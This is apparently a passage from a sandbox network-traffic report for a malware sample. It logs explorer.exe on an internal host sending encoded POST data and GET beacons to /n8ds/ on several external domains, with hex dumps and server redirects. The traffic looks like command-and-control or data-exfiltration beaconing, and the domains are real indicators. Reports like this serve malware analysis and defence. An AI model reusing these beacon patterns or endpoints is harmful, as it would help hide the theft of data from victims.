                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">
                                                                                                                                                    Nov 29, 2021 14:11:17.251508951 CET7734INData Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22
                                                                                                                                                    Data Ascii: <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    34192.168.11.204984888.99.22.580C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:22.274576902 CET7779OUTPOST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.helpcloud.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.helpcloud.xyz
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.helpcloud.xyz/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Data Raw: 6c 5a 4f 44 3d 33 74 46 56 41 6b 56 78 59 32 64 4e 65 6d 46 33 51 6a 5a 5f 43 33 59 53 45 6d 67 53 65 4d 79 72 4f 42 66 30 73 76 68 51 37 39 6f 57 4a 68 59 57 38 7a 56 44 76 55 45 65 32 78 44 55 73 6e 52 4c 64 79 7a 37 48 77 78 47 30 76 52 53 64 74 74 44 75 67 4c 59 67 58 56 38 75 54 77 37 63 52 4d 72 48 56 36 31 4a 47 4f 78 34 68 44 75 39 44 42 74 79 37 77 72 42 6b 64 34 71 6f 75 5f 33 6e 51 46 43 5f 69 54 36 6b 70 55 6c 55 50 36 65 59 64 30 70 63 72 52 5a 6c 61 4a 47 34 55 42 6a 4f 45 63 37 51 57 61 36 61 51 6a 41 33 44 45 58 6d 36 49 62 30 35 6e 6b 68 45 4d 51 39 6e 70 54 4b 48 73 6f 64 57 70 73 42 54 34 34 4f 48 77 6e 74 51 43 77 57 41 49 74 66 6d 47 7e 66 75 62 55 63 59 41 30 71 69 6b 45 66 45 61 59 4b 50 31 56 6c 58 55 75 58 62 53 63 5f 4c 48 43 67 30 55 6e 53 71 6e 6c 6c 67 2d 64 5a 53 35 28 49 63 59 57 7a 34 66 48 77 7a 33 32 66 69 4b 5a 4d 73 6a 55 30 54 4a 52 35 39 4d 44 6b 49 49 74 6d 73 6d 69 64 73 78 61 64 43 5f 7a 75 38 51 77 32 63 78 73 71 53 5a 79 78 4a 71 34 79 4f 59 64 33 4a 47 39 5f 56 73 42 42 66 6e 49 4e 74 52 73 66 62 61 61 37 35 44 79 36 6e 6b 48 64 4c 47 28 4e 49 61 79 42 70 71 63 5a 41 4b 47 53 6b 63 4f 38 37 47 41 54 41 45 72 56 50 55 6c 74 75 58 38 5a 55 62 53 4b 44 4b 5a 50 6c 37 47 56 6e 4c 6c 75 4d 34 37 31 33 4c 4f 72 6b 6d 6e 64 62 36 28 59 37 47 36 75 51 44 43 6f 63 68 7a 59 63 4e 44 64 46 48 66 53 37 56 6f 34 41 6e 72 67 77 4d 73 37 79 31 36 44 4a 2d 4b 76 41 56 5a 64 69 63 38 63 7a 31 44 41 49 4c 28 6d 38 45 75 63 6f 7a 65 55 78 53 54 44 76 6e 77 6d 6e 5f 32 54 48 2d 45 4d 4c 51 46 41 38 30 58 41 7e 71 64 73 38 66 6a 48 72 71 44 5a 76 76 46 52 53 51 73 6d 36 4d 5a 6e 64 65 39 43 71 62 6d 45 72 46 37 68 79 75 44 34 52 70 74 52 6f 33 62 56 65 61 72 64 57 30 58 6e 38 76 4b 6d 7e 59 49 62 36 37 5a 76 52 31 71 35 30 68 4f 50 45 39 33 4a 76 30 48 63 32 46 4b 35 39 6e 51 74 75 7a 30 71 6b 5a 47 48 32 30 28 59 35 6b 68 51 65 50 62 37 6f 46 71 2d 4f 4c 37 5f 4c 70 38 44 68 38 30 47 79 4a 69 34 63 36 53 61 63 34 59 31 69 52 67 71 53 74 73 61 6f 6a 4a 51 5a 67 74 6f 6a 54 6d 79 63 4c 52 34 39 58 59 43 4e 63 44 54 64 71 47 4b 45 55 4f 61 74 31 37 49 4a 78 5a 33 57 4b 6c 76 44 38 54 55 55 6f 6f 70 6f 72 38 63 5a 79 44 6b 54 47 28 34 36 74 61 65 61 64 57 47 78 31 7e 39 4e 42 53 6f 56 46 55 6c 65 76 64 7a 71 5f 78 4e 54 4e 77 50 52 57 4b 6d 78 30 34 6b 69 49 28 47 56 52 49 52 63 68 4d 77 56 41 71 36 49 63 44 48 4c 46 37 69 28 56 70 59 69 4a 74 6f 59 7a 66 4a 77 55 50 76 73 61 6a 45 48 67 68 48 4f 47 34 48 30 46 69 4c 68 76 4a 44 4c 45 65 71 42 58 28 59 31 4c 58 41 6d 6f 52 47 78 59 6d 41 6d 68 52 39 77 78 30 31 28 6c 37 49 4f 55 4d 48 57 57 4f 4f 79 31 52 52 75 46 44 57 48 56 6d 49 4f 4b 69 57 4e 46 77 37 70 36 38 6c 36 38 7e 4d 4a 65 69 65 52 33 69 6b 42 4a 56 5f 51 79 41 59 45 53 65 58 41 61 6e 67 54 57 39 53 51 61 4a 47 75 6b 73 66 76 51 6d 5a 41 42 74 50 46 63 6b 72 50 30 77 39 74 78 49 74 58 38 38 51 47 66 58 30 50 36 70 53 53 46 38 67 4c 64 39 48 66 44 4a 38 4d 38 67 6f 63 78 44 31 64 67 4c 55 6d 64 43 6f 77 6a 78 36 59 38 47 4f 6a 56 70 33 69 61 69 70 77 55 6d 57 49 54 5a 6c 73 44 65 52 50 44 6a 4c 50 53 79 31 4b 73 58 2d 38 4a 73 2d 4a 2d 36 46 50 6e 47 4e 48 2d 7e 42 71 30 4b 49 32 4f 6f 41 6c 55 48 67 75 4e 4c 50 56 77 63 6f 68 74 31 50 68 67 6c 46 35 32 66 58 34 4c 52 70 6a 4b 6f 6c 34 70 79 31 7e 39 38 65 64 46 78 2d 6e 44 52 65 4f 47 34 50 65 4d 66 35 70 75 6d 67 47 76 51 79 55 75 66 6f 72 6a 7e 73 4c 50 55 54 61 5f 39 50 79 4f 4a 45 63 2d 51 42 54 6c 57 64 78 7a 6d 59 6c 56 4d 71 73 69 52 64 73 72 4f 46 36 48 62 44 77 73 4f 71 74 45 6b 6e 54 62 47 37 32 5a 31 38 78 6a 62 77 6d 47 73 37 6a 6a 47 42 39 32 6a 4e 72 47 6b 68 50 30 54 68 66 5f 57 70 6f 61 28 59 7e 59 31 72 58 36 6f 70 79 6f 4b 52 50 74 75 34 43 35 59 69 6b 6e 76 4e 46 61 6d 6b 61 74 55 36 72 68 64 30 54 67 46 56 50 79 44 65 6e 50 67 33 37 58 71 72 38 51 59 62 4e 6c 6b 6a 46 56 68 32 52 54 30 4b 6d 50 65 62 28 39 7a 44 57 76 34 49 4e 44 6c 4d 56 77 35 67 46 5f 74 72 58 55 4d 44 5a 41 75 53 4a 72 7e 6f 76 42 52 5f 4d 43 44 74 68 43 7e 4b 31 63 36 50 72 45 6d 73 6f 70 53 6e 76 51 54 49 61 45 74 42 58 71 33 2d 43 30 70 37
                                                                                                                                                    Data Ascii: lZOD=3tFVAkVxY2dNemF3QjZ_C3YSEmgSeMyrOBf0svhQ79oWJhYW8zVDvUEe2xDUsnRLdyz7HwxG0vRSdttDugLYgXV8uTw7cRMrHV61JGOx4hDu9DBty7wrBkd4qou_3nQFC_iT6kpUlUP6eYd0pcrRZlaJG4UBjOEc7QWa6aQjA3DEXm6Ib05nkhEMQ9npTKHsodWpsBT44OHwntQCwWAItfmG~fubUcYA0qikEfEaYKP1VlXUuXbSc_LHCg0UnSqnllg-dZS5(IcYWz4fHwz32fiKZMsjU0TJR59MDkIItmsmidsxadC_zu8Qw2cxsqSZyxJq4yOYd3JG9_VsBBfnINtRsfbaa75Dy6nkHdLG(NIayBpqcZAKGSkcO87GATAErVPUltuX8ZUbSKDKZPl7GVnLluM4713LOrkmndb6(Y7G6uQDCochzYcNDdFHfS7Vo4AnrgwMs7y16DJ-KvAVZdic8cz1DAIL(m8EucozeUxSTDvnwmn_2TH-EMLQFA80XA~qds8fjHrqDZvvFRSQsm6MZnde9CqbmErF7hyuD4RptRo3bVeardW0Xn8vKm~YIb67ZvR1q50hOPE93Jv0Hc2FK59nQtuz0qkZGH20(Y5khQePb7oFq-OL7_Lp8Dh80GyJi4c6Sac4Y1iRgqStsaojJQZgtojTmycLR49XYCNcDTdqGKEUOat17IJxZ3WKlvD8TUUoopor8cZyDkTG(46taeadWGx1~9NBSoVFUlevdzq_xNTNwPRWKmx04kiI(GVRIRchMwVAq6IcDHLF7i(VpYiJtoYzfJwUPvsajEHghHOG4H0FiLhvJDLEeqBX(Y1LXAmoRGxYmAmhR9wx01(l7IOUMHWWOOy1RRuFDWHVmIOKiWNFw7p68l68~MJeieR3ikBJV_QyAYESeXAangTW9SQaJGuksfvQmZABtPFckrP0w9txItX88QGfX0P6pSSF8gLd9HfDJ8M8gocxD1dgLUmdCowjx6Y8GOjVp3iaipwUmWITZlsDeRPDjLPSy1KsX-8Js-J-6FPnGNH-~Bq0KI2OoAlUHguNLPVwcoht1PhglF52fX4LRpjKol4py1~98edFx-nDReOG4PeMf5pumgGvQyUuforj~sLPUTa_9PyOJEc-QBTlWdxzmYlVMqsiRdsrOF6HbDwsOqtEknTbG72Z18xjbwmGs7jjGB92jNrGkhP0Thf_Wpoa(Y~Y1rX6opyoKRPtu4C5YiknvNFamkatU6rhd0TgFVPyDenPg37Xqr8QYbNlkjFVh2RT0KmPeb(9zDWv4INDlMVw5gF_trXUMDZAuSJr~ovBR_MCDthC~K1c6PrEmsopSnvQTIaEtBXq3-C0p7P8P6LPTQ3Mt6vMwlSTrb7Zyf34n7Ht5lI-ID0ZsIGgjyrZzK42UMoUBAVR4x4WNiZQKkqGZJevl8ayiJO4jbx2nVoogFUWZPZxB6kCPNuv6a44Iys1YKWZnmENFNCHAbYrtEoX4dagzS6w(WQtV5NC(4XORjsdx-v0IvYTjHmjVq(yngKW2OKUJQ7-zF4KFUjk5HcYnoNndp~q1SEHYaao8kf77rscDbgDViqKnHMH3GxIby36ivwQzS6ys0om0CLysyVNSIsTQb(zd65CKtCq8k(UxQ6qQLsOGeyUlZNdlevPQRoL3CC-3qNxSoyCHhNvz7bPI3wD7EjXdNCR4TcdDcGa3q7Z3EtRD961Vcj3YWtd6GwmkMXe(RKXWltWcNjGu7e_DWHjzCmohVM1OVhpUwZ2bFSzSNSYf9Ir~CEh(dNEvWURPtdkPT3PPeRmP6b-gA3iqZtbtOSSAiG0FTI9KGrBx9jmRQRNqXK36RsssR8qkymZPbkDSNKnZhHtgkv-M0RtJ4r-GcdL28OQ~EKOR1VMV2dKxCXZTPN3lbjYp1k3BpTnGN57jXMLpn(CrVze3Um8(R76WrkWENbs3X81OAYEWsne2tWNxGRptlC4Uw(FwPBAZjc4VIS2F_cD(3m7PBVG2BrrT0KZpCkfRiVg5vLTfOvB0xnSTXftUrRcXxBDimvIpke_ODDaZX5dXsuEJhvqjh~VEAZR5iZjyrneGGQHt1PpW_ib0LF6j2urMAZrc7SaVdiUMR33fcYoj5afZeza(Hyafu2VhF~9JtOuaB0lIlLasigUG5rT9Dvkdv0He2sfrLLAS67m35lxZWn-9uAkxWgGYNVdj30zC5g1qKGIL0iKQazDI9bEfQepqlp0nDaEPvQxljD9axmAt6skg7CGdPufZgjTMJbQo
                                                                                                                                                    Nov 29, 2021 14:11:22.274683952 CET7789OUTData Raw: 75 79 69 75 59 51 57 28 4c 73 4f 54 57 4c 39 45 4a 76 6b 73 69 4d 37 49 70 4b 6c 58 34 67 74 36 74 48 51 6c 56 43 46 66 4d 61 57 6f 70 4a 64 56 54 4a 42 4b 55 45 53 76 45 4f 55 53 72 62 41 74 62 56 74 6c 51 32 54 7a 39 37 6d 6e 2d 76 2d 67 4a 79
                                                                                                                                                    Data Ascii: uyiuYQW(LsOTWL9EJvksiM7IpKlX4gt6tHQlVCFfMaWopJdVTJBKUESvEOUSrbAtbVtlQ2Tz97mn-v-gJygRtrFoBwJplOncOEGCDHwV-op0rG8eijShKuJqmQcJVZn(FGhJc~vEoMvOALXthu5s8JTgn5snjxTxoPrpe7L(ArI5DgCm-FdvTfKeOo8cWSJiyPCDpsTla98c9zgYDZTe0ZM5qiqwolCq3ysIyjz(ndWW98H670D
                                                                                                                                                    Nov 29, 2021 14:11:22.289494038 CET7790INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:22 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 178
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.helpcloud.xyz:443/n8ds/
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                                                                                                                    Nov 29, 2021 14:11:22.289649010 CET7793OUTData Raw: 64 38 37 7a 6a 46 43 7e 75 65 78 7e 64 38 53 4a 46 4e 34 65 38 6c 6f 6b 2d 7e 72 55 73 42 48 61 33 36 78 38 4e 65 47 44 69 57 63 58 31 66 47 67 50 67 53 78 55 43 47 4d 66 58 35 75 65 31 49 30 4a 28 2d 28 75 46 67 69 66 48 4a 74 62 6f 69 32 59 49
                                                                                                                                                    Data Ascii: d87zjFC~uex~d8SJFN4e8lok-~rUsBHa36x8NeGDiWcX1fGgPgSxUCGMfX5ue1I0J(-(uFgifHJtboi2YIPUaE_dwZJTC4m(oi7TE~Cf_kDSu4HZvVbwTr3REA5ot2pq6GSp9jtpAa57h5pjb5nU-vEAmROMx4hvaQgRl~vs-7zc6g8o8Gorq8vSVubL45MzwmFx2dlgpZbInpadw4NBzBWl_4L4Op9oL82(oFYCfvx~Iw0qQ5L


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    35192.168.11.204984988.99.22.580C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:22.290071011 CET7793OUTGET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1
                                                                                                                                                    Host: www.helpcloud.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:11:22.304858923 CET7794INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:22 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 178
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.helpcloud.xyz:443/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    36192.168.11.2049850172.120.157.18780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:27.479099035 CET7801OUTPOST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.stylesbykee.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stylesbykee.com
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.stylesbykee.com/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Data Raw: 6c 5a 4f 44 3d 66 67 68 52 6d 72 6b 48 55 47 6e 35 4a 48 48 45 49 70 6a 70 68 44 7a 6e 6b 66 54 64 7e 34 6d 4b 46 31 6c 79 4d 53 54 69 43 35 68 57 50 6e 77 78 37 53 34 44 78 33 77 61 41 79 66 56 54 4a 4b 43 67 63 73 63 47 73 43 7a 6a 4f 59 47 70 47 38 4b 6e 4e 4d 6f 6d 7a 66 57 4b 76 42 66 50 74 49 43 44 67 64 5f 76 35 58 65 61 35 70 72 51 64 69 63 55 47 57 6a 56 4b 55 4f 55 69 46 59 37 59 28 55 6f 35 6e 75 42 34 4f 74 33 58 6f 7a 4f 2d 33 6b 71 35 30 6a 41 56 41 6c 7e 73 41 36 33 36 53 5f 35 62 50 59 37 73 42 35 75 6e 50 52 56 65 37 55 33 31 6c 64 4c 45 4a 56 70 67 67 4c 41 56 76 78 65 61 36 77 62 46 62 48 48 34 6c 54 30 33 32 5a 4f 4f 42 49 73 79 38 42 68 56 77 4b 4e 59 46 36 6c 4b 7e 74 6d 78 61 72 5a 4a 6f 6a 44 31 75 74 73 33 49 50 56 32 38 4c 6d 4c 37 38 67 5f 4e 44 37 50 32 68 4f 30 59 5f 45 37 34 78 63 48 54 30 30 6a 73 59 52 78 70 35 31 46 52 38 50 31 76 73 49 36 56 68 32 67 76 30 62 38 6e 51 73 6d 7e 65 32 5f 28 79 50 50 58 70 36 74 70 39 56 37 73 31 35 4d 31 59 4b 4d 68 4c 53 56 79 57 5a 45 56 44 7e 44 70 47 34 54 71 34 6c 37 32 6a 6a 45 4a 58 77 47 69 6d 77 4c 6c 79 74 73 63 54 35 69 28 7a 61 52 62 4b 49 6b 32 48 6b 5f 67 48 41 6a 68 6a 64 72 44 38 58 75 37 56 28 32 77 30 47 77 32 58 71 45 4e 43 62 68 31 77 44 5a 75 6e 6a 5a 4c 49 70 6a 79 45 68 50 28 59 31 73 4a 4e 33 39 48 66 74 35 51 38 58 6d 66 75 79 53 70 68 4a 75 45 6e 44 51 78 6a 36 5f 50 68 51 6c 51 44 62 5f 52 5a 63 58 69 65 4b 51 64 58 69 6a 32 31 48 56 4a 6d 4d 4e 35 4f 6f 33 4d 48 6f 50 35 33 69 76 38 77 38 42 52 39 67 63 4a 30 63 45 33 31 74 45 76 45 41 70 75 4b 34 36 58 6a 51 75 75 46 41 4b 70 6a 32 56 54 39 74 50 53 66 37 39 30 69 5a 38 35 4f 57 69 76 68 28 4e 76 56 6b 33 41 38 35 70 63 6d 70 73 55 35 4f 59 47 54 63 6c 73 6c 69 51 69 72 49 2d 67 4a 79 62 42 69 7e 4d 42 51 6b 65 30 6e 6c 62 75 6e 76 7a 75 32 34 4a 49 5a 39 66 67 4e 45 49 73 67 6e 7a 6e 7a 77 54 6b 4e 45 6a 32 51 48 7a 6e 49 4b 44 37 31 77 51 51 34 43 6f 41 41 73 69 6f 5f 48 53 4e 4a 65 74 34 54 4b 6d 4b 54 41 45 4e 55 48 7a 68 2d 4a 4e 38 6a 53 55 67 54 48 44 6b 68 6a 76 4b 72 42 58 63 5a 45 36 4f 50 6e 75 4d 74 7e 38 39 61 6a 31 46 30 4b 4f 31 2d 6b 58 63 54 58 6e 48 71 62 4f 59 6d 33 39 56 33 59 4c 37 74 6b 31 79 75 33 53 59 4f 79 44 6f 44 77 47 35 44 70 6e 36 66 7a 2d 6a 66 76 2d 54 69 63 62 77 65 51 76 4b 36 58 41 46 6a 58 4e 42 69 30 77 66 49 42 52 58 48 64 4c 49 73 42 54 68 53 65 61 44 7a 6f 73 4a 67 69 6a 63 61 47 59 6a 49 79 58 66 70 55 71 4d 54 52 71 6b 53 38 79 41 61 72 5f 34 4e 59 4c 54 5f 7a 63 38 63 65 4c 6f 31 62 5f 6e 57 44 52 34 5f 63 75 68 6d 70 78 42 73 28 48 41 31 46 39 66 49 76 6a 48 45 54 6d 4b 35 46 75 35 4e 78 41 57 68 31 77 51 36 31 79 32 6e 7e 42 34 58 71 33 73 75 64 77 49 5f 58 64 69 30 76 4d 70 48 30 51 51 33 38 58 72 35 79 64 41 79 43 70 47 67 4a 74 73 43 63 33 37 6d 4e 66 4a 61 76 6d 79 47 50 63 73 77 55 4b 47 6f 38 48 76 72 69 6e 62 41 5a 78 35 44 4b 57 63 75 6a 49 68 71 54 58 6d 73 4f 30 42 74 57 31 28 74 44 30 30 75 71 58 51 73 75 6e 64 39 35 61 64 75 69 6b 50 56 58 44 39 6b 4a 74 65 6c 44 36 6d 66 61 7a 56 30 7e 39 6a 69 79 57 6c 48 69 69 58 33 36 66 55 37 58 37 67 48 6a 73 48 63 72 4c 37 4b 6c 52 7e 42 6c 34 31 44 33 67 34 69 41 77 45 58 49 56 30 77 4a 37 6b 32 62 48 76 4a 4c 6b 4e 70 6e 5a 73 54 64 4f 28 68 75 7a 46 6f 6f 33 71 65 6a 63 57 35 69 67 6e 67 54 50 47 79 6a 43 44 5f 68 6b 61 48 39 4c 37 68 49 41 6b 50 44 46 4d 76 70 43 63 67 63 47 43 64 28 65 33 51 76 2d 5a 6a 47 67 56 59 49 48 6c 6e 59 4c 44 47 4f 75 78 4c 56 6c 58 36 6e 49 74 6f 35 50 54 53 49 4e 62 39 36 6e 59 72 44 78 57 46 76 42 6f 50 35 73 77 6b 32 55 34 57 28 53 36 57 38 47 4e 44 7e 32 6f 2d 62 52 49 6d 33 68 43 6e 79 4c 52 4e 43 50 74 33 6c 34 72 30 43 6d 77 34 32 62 59 4a 45 58 6f 6e 50 54 66 64 4d 73 4e 6c 63 72 6d 35 46 79 51 48 78 4d 6e 70 4a 68 48 4f 54 76 58 59 51 34 48 6d 76 7a 65 36 58 57 72 33 54 58 47 6e 61 4b 31 46 63 7a 7e 36 56 2d 70 6e 6a 48 4f 48 45 49 32 62 79 39 46 6f 44 4c 6e 58 70 45 4c 2d 66 35 46 47 38 59 52 48 7a 74 7a 43 31 72 62 50 6d 49 33 56 4a 50 34 30 79 46 4c 6d 75 48 72 45 74 44 72 51 73 4d 4e 6f 72 4c 33 33 74 76 54 62 35 37 28 6b 31 67
                                                                                                                                                    Data Ascii: lZOD=fghRmrkHUGn5JHHEIpjphDznkfTd~4mKF1lyMSTiC5hWPnwx7S4Dx3waAyfVTJKCgcscGsCzjOYGpG8KnNMomzfWKvBfPtICDgd_v5Xea5prQdicUGWjVKUOUiFY7Y(Uo5nuB4Ot3XozO-3kq50jAVAl~sA636S_5bPY7sB5unPRVe7U31ldLEJVpggLAVvxea6wbFbHH4lT032ZOOBIsy8BhVwKNYF6lK~tmxarZJojD1uts3IPV28LmL78g_ND7P2hO0Y_E74xcHT00jsYRxp51FR8P1vsI6Vh2gv0b8nQsm~e2_(yPPXp6tp9V7s15M1YKMhLSVyWZEVD~DpG4Tq4l72jjEJXwGimwLlytscT5i(zaRbKIk2Hk_gHAjhjdrD8Xu7V(2w0Gw2XqENCbh1wDZunjZLIpjyEhP(Y1sJN39Hft5Q8XmfuySphJuEnDQxj6_PhQlQDb_RZcXieKQdXij21HVJmMN5Oo3MHoP53iv8w8BR9gcJ0cE31tEvEApuK46XjQuuFAKpj2VT9tPSf790iZ85OWivh(NvVk3A85pcmpsU5OYGTclsliQirI-gJybBi~MBQke0nlbunvzu24JIZ9fgNEIsgnznzwTkNEj2QHznIKD71wQQ4CoAAsio_HSNJet4TKmKTAENUHzh-JN8jSUgTHDkhjvKrBXcZE6OPnuMt~89aj1F0KO1-kXcTXnHqbOYm39V3YL7tk1yu3SYOyDoDwG5Dpn6fz-jfv-TicbweQvK6XAFjXNBi0wfIBRXHdLIsBThSeaDzosJgijcaGYjIyXfpUqMTRqkS8yAar_4NYLT_zc8ceLo1b_nWDR4_cuhmpxBs(HA1F9fIvjHETmK5Fu5NxAWh1wQ61y2n~B4Xq3sudwI_Xdi0vMpH0QQ38Xr5ydAyCpGgJtsCc37mNfJavmyGPcswUKGo8HvrinbAZx5DKWcujIhqTXmsO0BtW1(tD00uqXQsund95aduikPVXD9kJtelD6mfazV0~9jiyWlHiiX36fU7X7gHjsHcrL7KlR~Bl41D3g4iAwEXIV0wJ7k2bHvJLkNpnZsTdO(huzFoo3qejcW5igngTPGyjCD_hkaH9L7hIAkPDFMvpCcgcGCd(e3Qv-ZjGgVYIHlnYLDGOuxLVlX6nIto5PTSINb96nYrDxWFvBoP5swk2U4W(S6W8GND~2o-bRIm3hCnyLRNCPt3l4r0Cmw42bYJEXonPTfdMsNlcrm5FyQHxMnpJhHOTvXYQ4Hmvze6XWr3TXGnaK1Fcz~6V-pnjHOHEI2by9FoDLnXpEL-f5FG8YRHztzC1rbPmI3VJP40yFLmuHrEtDrQsMNorL33tvTb57(k1giFCvtW2SPgCKg-ZwI3gN~FsM~VJJALYw2ybPyuMLX1Gb4agw6kjOQ-QOrrvPPRxZtVU8~5ymdeOvzVOpqWL-av1e0vSkFkWNa9TsEVeV64E5rorZ77B2L4w2pWvJ4Akht-lqAq0_N9hGG5POZ70UeR1oQhBVYgRHb6WCde7_onrO250unnTS(HWvHcVPOtvvue~Uy1a_5VaUmLkO6daqU5bAezik82rwGqtum8mRZWcKXIchzKlRE3~_Ch8lEYftq6brta61pHQKMDo7Ll1Z6_3ipn3Ah4dL4X6bjpgqXQUZFoj73pzoK3g_FnzvkNNlN5mstvw_a5w5emBVDSZGc7CjWOtNovAPtH52oOdQojqBaevBjbGtvDszlnS6(GckbghQV7OdC-USIrZvPtd65506fmNZnUGUZTWAq5D0mnS0ljkSBLc9ECuc9uZrGJ8vt3CcnwF-RcXv7Gm2ia89gKRgqbn9C5Vmw0AIU86GogIpJFKNPXY6HZcM3MOHwNZ4DMlxaDMf1VawomShPXvkp-3brngikKUMsu~LKLw3m6iOCBeyot48dpk_XrbvjEP2EQexNW6zOoqW4npztEzGOVNnq3WB74y9blBWs0OfCRET5NBh71WaP6(Zwp8US6pnMPtYhZudm8oBRXD9biA8yFhNfi0_2gj7usrQo2gU(05mRD6PZb6hj868hQRpN7lfrphzA1NBFPJoiICgY6yGlU29eg48K1sypATHCg(4